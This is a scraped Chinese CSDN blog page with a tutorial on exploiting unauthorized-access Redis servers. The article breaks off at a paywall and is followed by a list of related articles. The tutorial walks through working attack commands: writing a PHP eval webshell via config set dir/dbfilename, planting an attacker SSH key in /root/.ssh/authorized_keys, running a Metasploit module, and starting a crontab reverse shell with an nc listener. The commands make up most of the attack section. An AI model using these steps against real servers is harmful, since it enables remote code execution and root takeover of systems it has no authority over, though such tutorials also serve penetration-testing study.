浅谈redis未授权漏洞

最新推荐文章于 2024-03-13 21:36:20 发布
最新推荐文章于 2024-03-13 21:36:20 发布
阅读量132 收藏
点赞数 3
文章标签: redis java 数据库 网络安全 系统安全 网络攻击模型 密码学
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb528970805/article/details/132759800
版权
文章详细描述了如何利用Redis未授权漏洞进行远程代码执行,包括修改配置、写入webshell、使用SSH密钥、通过Msf工具攻击以及检测弱口令。同时提供了防御措施,如设置IP绑定和密码保护,以及Redis的基本安装、配置和安全实践。
摘要由CSDN通过智能技术生成

redis未授权漏洞

利用条件

版本比较高的redis需要修改redis的配置文件,将bind前面#注释符去掉,将protected-mode 后面改为no

 写入webshell

config get dir #查看redis数据库路径
config set dir web路径# #修改靶机Redis数据库路径
config set dbfilename shell.php #生成shell.php文件
set xxx "\r\n\r\n<?php phpinfo();?>\r\n\r\n"#将一句话木马写入文件中
#"\r\n\r\n"是换行的意思,用redis写入文件会自带一些版本信息,如果不换行可能导致无法执行。
set xxx "\r\n\r\n<?php @eval($_POST['coleak']);?>\r\n\r\n"#上传木马可以通过蚁剑连接
save#保存

ssh密钥连接

利用条件

1.当redis以root身份运行。

2.靶机redis链接未授权,在攻击机上能用redis-cli连上

3.存在/root/.ssh目录,如果不存在我们可以通过一句话木马连接蚁剑创建目录(权限问题可能不成功)。因为.ssh是隐藏目录可以通过ls -la查看有没有。

ssh-keygen -t rsa
将公钥id_rsa.pub里面内容复制到key.txt上传到靶机上面

cat key.txt | redis-cli -h ip -x set xxx#如果是windows 将cat换成type
#将公钥作为value插入到数据库中
redis-cli -h 192.168.43.141 
config get dir
config set dir /root/.ssh
config set dbfilename authorized_keys
save
ssh -i id_rsa root@ip

msf利用


msfdb run#开启msf
search redis#查看有关redis的模块
use 5
show options
set RHOST 192.168.3.207 #设置靶机的ip
run

利用crontab反弹shell

nc -lvnp 4444

redis-cli -h 192.168.0.104
set xxx "\n\n*/1 *
最低0.47元/天 解锁文章
网络安全玛卡巴卡
关注
恶意程序利用Redis授权访问缺陷入侵系统
当星宿都沉默
08-02 331
一、系统被入侵表现: 系统无法正常使用。 二、登录服务器查看: 系统被挖矿程序入侵,导致CPU占用极高。 三.解决方式: 1.关闭并彻底删除恶意程序 kill掉进程后,不一会儿进程有被启动。怀疑被植入了定时任务 通过crontab -l查看,果然被植入了定时任务,每五分钟获取并执行远程脚本。 最终将定时任务一并删除。 2.修改redis.conf配置文件: port/r...
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 3903
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
2024.03.11--redis授权漏洞和PHP反序列化
最新发布
sev1n的博客
03-13 1192
不定期分享学习笔记
Redis授权访问漏洞(一)先导篇
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-09 1530
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上。如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis以及读取Redis的数据。
phpRedisAdmin连接redis报Fatal error:
遥襟的博客
03-08 792
1、背景 在客户的项目中有很多场景下不允许开发、运维人员,通过本地的客户端工具连接redis、mysql之类的中间件,进行数据的查看、修改等。所以需要一些特定的软件进行连接。 2、工具解释 phpRedisAdmin phpRedisAdmin 是一个简单的 Web 界面来管理Redis数据库。它是在知识共享署名 3.0 许可下发布的。此代码由Erik Dubbelboer开发和维护。 phpRedisAdmin ——github地址 phpMyAdmin MySQL 和 MariaDB ..
浅谈Redis漏洞
weixin_43960884的博客
07-20 402
Redis授权访问漏洞 Redis是一种key-value键值对的非关系型数据库 默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行授权访问Redis Redis还支持本地存储,也就导致任意文件写入,攻击者在授权访...
SSRF漏洞Redis利用篇
weixin_39664643的博客
01-21 3439
SSRF漏洞Redis利用篇 SSRF–(Server-side Request Forge, 服务端请求伪造) 定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务 SSRF漏洞思维导图如下,本篇主要介绍利用SSRF漏洞攻击内网Redis SSRF攻击内网Redis 当存在SSRF漏洞且内网中Redis服务可以授权访问时,利用Redis 任意文件写入成为十分常见的利用方式,一般内网中会存在 root 权限运行的 Redis 服务,利用 Gopher 协议可以攻击内网
浅谈常见端口及对应漏洞
weixin_68243135的博客
09-22 1334
“渗透测试的本质就是信息收集“
浅谈云上攻防 --SSRF 漏洞带来的新威胁
YDclub的博客
10-09 1555
前言 在《浅谈云上攻防——元数据服务带来的安全挑战》一文中,生动形象的为我们讲述了元数据服务所面临的一系列安全问题,而其中的问题之一就是通过SSRF去攻击元数据服务;文中列举了2019年美国第一资本投资国际集团(Capital One Financial Corp.,下“Capital One公司”)信息泄漏的案例;我们内部也监测到过类似的事件:测试人员通过SSRF漏洞攻击元数据服务,并将获取到的AK信息存储到日志服务中,然后在日志服务中获取到了AK信息,最终通过获取到的AK信息控制了超过200台服务器。
Redis授权访问漏洞
看着博客敲代码
10-27 6400
Redis授权访问漏洞复现 一、redis简介 Redis 是一个开源(BSD许可)的,内存中的数据结构存储系统,它可以用作数据库、缓存和消息中间件。 它支持多种类型的数据结构,如 字符串(strings), 散列(hashes), 列表(lists), 集合(sets), 有序集合(sorted sets) 与范围查询, bitmaps, hyperloglogs 和 地理空间(geospatial) 索引半径查询。 Redis 内置了 复制(replication),LUA脚本(Lua scripti
比较好用的PHP防注入漏洞过滤函数代码
12-18
复制代码 代码如下: <?PHP //PHP整站防注入程序,需要在公共文件中require_once本文件 //判断magic_quotes_gpc状态 if (@get_magic_quotes_gpc ()) { $_GET = sec ( $_GET ); $_POST = sec ( $_POST ); $_COOKIE = sec ( $_COOKIE ); $_FILES = sec ( $_FILES ); } $_SERVER = sec ( $_SERVER ); function sec(&$array) { //如果是数组,遍历数组,递归调用 if (is_array (
Redis漏洞利用,原来大佬都是这样操作的
qq_42982923的博客
05-26 1950
出自:Tide安全团队 1、前言 Redis相关的漏洞存在很长时间了,仍然存在可以利用的情景,本次整理复现下redis相关的漏洞利用,以便以后遇到能够快速建立利用思路。 2、redis介绍 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set()、zset(sorted set –有序)和...
[漏洞复现]thinkphp5代码执行漏洞
Vicl1fe的博客
05-30 2974
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://paper.seebug.org/760/ 漏洞概述 漏洞利用
redis安全与管理
weixin_34068198的博客
04-27 64
2019独角兽企业重金招聘Python工程师标准>>> ...
Redis漏洞利用总结
YouthBelief的博客
10-29 6952
redis漏洞利用前言一、redis4.x`5.x授权访问漏洞0x01 漏洞描述0x02 影响范围0x03 环境搭建0x03 漏洞利用探测漏洞授权登录3.1 利用redis写webshell利用前提利用方法3.2 利用“公私钥” 认证获取root权限3.3 利用crontab反弹shell0x04 漏洞修复 前言 redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis默认使用 6379 端口。 一、redis4
phpRedisAdmin Redis_web界面管理工具
夕雨林流金,web全栈,web全端,网站技术博客
04-28 848
安装apache环境后下载 https://github.com/ErikDubbelboer/phpRedisAdmin https://github.com/nrk/predis 如果没有predis会提示autoload.php找不到文件 两个都要下载 解压后把predis解压到vendor下
Redis管理工具 RedisMyAdmin
pyzheng的专栏
05-27 1067
[url]http://www.oschina.net/p/redismyadmin[/url] RedisMyAdmin 这个一个简单的Redis数据库在线管理工具 本项目参考于phpRedisAdmin,部分核心代码源自于此项目 RedisMyAdmin最早于唯品会内部开源(v0.1),现使用CodeIgniter-2.2.0框架重新开发并在github开源 De...
安装phpRedisAdmin-完整版
weixin_34203832的博客
12-28 166
phpRedisAdmin是一个用于管理redis-server的软件,google了下,没找到完整版的安装方法。主要思路是先安装phpredis模块,然后安装phpRedisAdmin。监控页面是用php写的,phpredis模块用于php调用redis一些方法。 ps:个人完全不懂编程,我是这么理解的。不知道对不对 项目地址在:https://github.com/...
Redis授权漏洞的危害
04-04
Redis授权漏洞的危害包括但不限于以下几点: 1. 数据泄露:攻击者可以通过访问Redis授权的服务,获取到Redis中存储的敏感数据,例如用户密码、数据库信息、业务数据等。 2. 数据篡改:攻击者可以通过访问Redis...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值